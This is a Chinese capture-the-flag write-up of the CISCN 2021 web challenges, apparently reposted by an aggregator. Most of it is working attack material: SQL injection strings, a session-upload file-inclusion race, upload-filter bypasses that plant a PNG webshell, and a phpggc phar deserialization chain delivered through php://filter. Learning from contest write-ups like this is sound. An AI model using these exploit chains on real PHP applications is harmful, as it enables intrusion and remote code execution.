4
CISCN2021初赛 Web Writeup
source link: https://jlkl.github.io/2021/05/20/Web_18/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
easy_sql
报错注入,盲猜flag表,但不知道名称,用重复column名爆列名
参考:无列名注入小记
uname=%27)/**/||/**/(select/**/1/**/from/**/flag/**/where(select/**/*/**/from(select/**/*/**/from/**/flag/**/as a/**/join/**/flag/**/as/**/b/**/using(id,no))as/**/c))/**/or/**/('1&passwd=1&Submit=%E7%99%BB%E5%BD%95
uname=%27)/**/and/**/extractvalue(1,concat(0x7e,(select/**/substr(`e691d77e-5da1-409b-a37b-ff4edfa14123`,31)/**/from/**/flag),0x7e))/**/and/**/('0&passwd=1&Submit=%E7%99%BB%E5%BD%95
uname=%27)/**/and/**/extractvalue(1,concat(0x7e,(select/**/substr(`e691d77e-5da1-409b-a37b-ff4edfa14123`)/**/from/**/flag),0x7e))/**/and/**/('0&passwd=1&Submit=%E7%99%BB%E5%BD%95
读出flag CISCN{9fO5F-WC2YL-GY3zM-R4aIu-kAjxU-}
easy_source
原题:https://r0yanx.com/2020/10/28/fslh-writeup/
middle_source
扫出来一个phpinfo 页面
根据phpinfo ,猜测可能是 session 包含,因此启动两个线程,一个包含 php 内容,一个访问包含,就 var_dump /etc 了好几次有点难受
session_upload_process
POST /index.php HTTP/1.1
Host: 124.71.229.172:21940
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=star1
Content-Length: 1343
Content-Type: multipart/form-data; boundary=a052c080752fddf220113461b22d48a7
--a052c080752fddf220113461b22d48a7
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
<?php
$root='/etc/fhfeeeaagb/badidicfgc/eabdhbdgeb/babgfddbff';
$filenames=scandir($root);
while(is_dir($filenames[2])){
$root=$root.'/'.$filenames[2];
$filenames=scandir($root);
}
var_dump($root.'/'.$filenames[2]);
var_dump(file_get_contents($root.'/'.$filenames[2]));
?>
--a052c080752fddf220113461b22d48a7
Content-Disposition: form-data; name="file"; filename="1.txt"
a*100000
POST /index.php HTTP/1.1
Host: 124.71.229.172:21940
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Cookie: PHPSESSID=star1
Connection: close
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
cf=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fcafdcffacd%2Fsess_star1
两个包放在repeater 里面 30 线程跑,不断看结果,改目录。
最后目录在/etc/fhfeeeaagb/badidicfgc/eabdhbdgeb/babgfddbff/fbhbiaihha/fl444444g直接包含
CISCN{lxs4A5ku06-ywSkx-iasCN-9AMPN-}
upload
index.php
<?php
if (!isset($_GET["ctf"])) {
highlight_file(__FILE__);
die();
}
if(isset($_GET["ctf"]))
$ctf = $_GET["ctf"];
if($ctf=="upload") {
if ($_FILES['postedFile']['size'] > 1024*512) {
die("这么大个的东西你是想d我吗?");
}
$imageinfo = getimagesize($_FILES['postedFile']['tmp_name']);
if ($imageinfo === FALSE) {
die("如果不能好好传图片的话就还是不要来打扰我了");
}
if ($imageinfo[0] !== 1 && $imageinfo[1] !== 1) {
die("东西不能方方正正的话就很讨厌");
}
$fileName=urldecode($_FILES['postedFile']['name']);
if(stristr($fileName,"c") || stristr($fileName,"i") || stristr($fileName,"h") || stristr($fileName,"ph")) {
die("有些东西让你传上去的话那可不得了");
}
$imagePath = "image/" . mb_strtolower($fileName);
if(move_uploaded_file($_FILES["postedFile"]["tmp_name"], $imagePath)) {
echo "upload success, image at $imagePath";
} else {
die("传都没有传上去");
}
}
getimagesize判断是否图片,要求图片宽和高为1,同时要求后缀不能有c、i、h、ph,那么上传php和.htaccess就不行了
example.php
<?php
if (!isset($_GET["ctf"])) {
highlight_file(__FILE__);
die();
}
if(isset($_GET["ctf"]))
$ctf = $_GET["ctf"];
if($ctf=="poc") {
$zip = new \ZipArchive();
$name_for_zip = "example/" . $_POST["file"];
if(explode(".",$name_for_zip)[count(explode(".",$name_for_zip))-1]!=="zip") {
die("要不咱们再看看?");
}
if ($zip->open($name_for_zip) !== TRUE) {
die ("都不能解压呢");
}
echo "可以解压,我想想存哪里";
$pos_for_zip = "/tmp/example/" . md5($_SERVER["REMOTE_ADDR"]);
$zip->extractTo($pos_for_zip);
$zip->close();
unlink($name_for_zip);
$files = glob("$pos_for_zip/*");
foreach($files as $file){
if (is_dir($file)) {
continue;
}
$first = imagecreatefrompng($file);
$size = min(imagesx($first), imagesy($first));
$second = imagecrop($first, ['x' => 0, 'y' => 0, 'width' => $size, 'height' => $size]);
if ($second !== FALSE) {
$final_name = pathinfo($file)["basename"];
imagepng($second, 'example/'.$final_name);
imagedestroy($second);
}
imagedestroy($first);
unlink($file);
}
}
从压缩包解压,并对图片重新裁剪
这里有一个trick,mb_strtolower处理某些unicode字符时会有问题
var_dump(mb_strtolower('İ')==='i');
//true
这里stristr判断黑名单后又用mb_strtolower处理,且有二次urldecode,那么思路就很明显了,上传zip压缩包文件,然后解压getshell
常规图片马都是在末尾添加php代码,但是这里解压过后会对图片进行裁剪,导致php代码丢失,所以这里采用写入到图片数据里,即IDAT块
用这个工具生成图片马
https://github.com/huntergregal/PNG-IDAT-Payload-Generator/
更改后缀为php,然后打包进zip压缩包
这里又有一个trick,可以用下面内容绕过getimagesize
#define width 1
#define height 1
百度了一下大概是xmb图片定义宽高的方法,可以在文件任何位置,但是必须在一行的开头(即前面必须有%0d%0a)
访问getshell
同时这里记录一个坑点,我之前调试的时候使用的是2020.1版本的burpsuite,但是上传文件之后总发现文件内容被更改了,后来才发现paste from file的时候burp把一些十六进制字符比如8D直接就转换成了3F,emmm……后来换成最新版burp就没问题了,还是应该及时更新
filter
首先搭建一个yii环境
composer create-project --prefer-dist yiisoft/yii2-app-basic my-yii
加上提示配置
'log' => [
'traceLevel' => YII_DEBUG ? 0 : 0,
'targets' => [
[
'class' => 'yii\log\FileTarget',
'levels' => ['error'],
'logVars' => [],
],
],
],
发现 /runtime/logs/app.log日志文件,和Laravel的差不多
题目附件里改动就这一个路由,读取文件再写入,那么整体思路应该和Laravel Debug RCE差不多,清空log文件,写入phar,然后再phar反序列化
可以参考:https://www.anquanke.com/post/id/231459
composer.json存在拓展monolog,phpggc刚好在版本范围内
生成payload
./phpggc monolog/rce2 phpinfo 1 --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt
清空日志文件
http://dd60ec6c-4197-4c9b-8dd0-8651a607fa70.node3.buuoj.cn/?file=php://filter/read=consumed/resource=../runtime/logs/app.log
写入payload,注意最后面有一个a(这是为了能完整地将payload解码出来)
http://dd60ec6c-4197-4c9b-8dd0-8651a607fa70.node3.buuoj.cn/?file==50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=71=00=36=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=6A=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=78=00=4F=00=69=00=49=00=78=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=6D=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=34=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=70=00=62=00=6D=00=6C=00=30=00=61=00=57=00=46=00=73=00=61=00=58=00=70=00=6C=00=5A=00=43=00=49=00=37=00=59=00=6A=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=78=00=70=00=62=00=57=00=6C=00=30=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4E=00=76=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=49=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=54=00=61=00=58=00=70=00=6C=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6A=00=45=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=54=00=6F=00=69=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=67=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=6C=00=75=00=61=00=58=00=52=00=70=00=59=00=57=00=78=00=70=00=65=00=6D=00=56=00=6B=00=49=00=6A=00=74=00=69=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4E=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=54=00=47=00=6C=00=74=00=61=00=58=00=51=00=69=00=4F=00=32=00=6B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=32=00=39=00=79=00=63=00=79=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=6A=00=64=00=58=00=4A=00=79=00=5A=00=57=00=35=00=30=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=77=00=61=00=48=00=42=00=70=00=62=00=6D=00=5A=00=76=00=49=00=6A=00=74=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=48=00=73=00=4B=00=6C=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=74=00=67=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=48=00=73=00=4B=00=6C=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=74=00=67=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=47=00=54=00=77=00=30=00=7A=00=65=00=63=00=42=00=6C=00=74=00=50=00=57=00=55=00=65=00=6C=00=4F=00=6D=00=6D=00=48=00=30=00=33=00=4C=00=4B=00=4F=00=2B=00=71=00=61=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00a
清除其他字符
http://dd60ec6c-4197-4c9b-8dd0-8651a607fa70.node3.buuoj.cn/?file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log
phar序列化
http://dd60ec6c-4197-4c9b-8dd0-8651a607fa70.node3.buuoj.cn/?file=phar://../runtime/logs/app.log
和Laravel Debug RCE的区别?
日志中只出现一次完整payload,还有一次到15字符省略的payload
因为在utf-16le->utf-8的时候必须要求是偶数字节,不然会报错,所以在Laravel Debug RCE的时候会先发送一个AA的文件名让日志必定为偶数字节
在yii这里测试的时候本身就是偶字节的原因,就不需要提前发了,但是在调试Laravel的时候需要注意
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK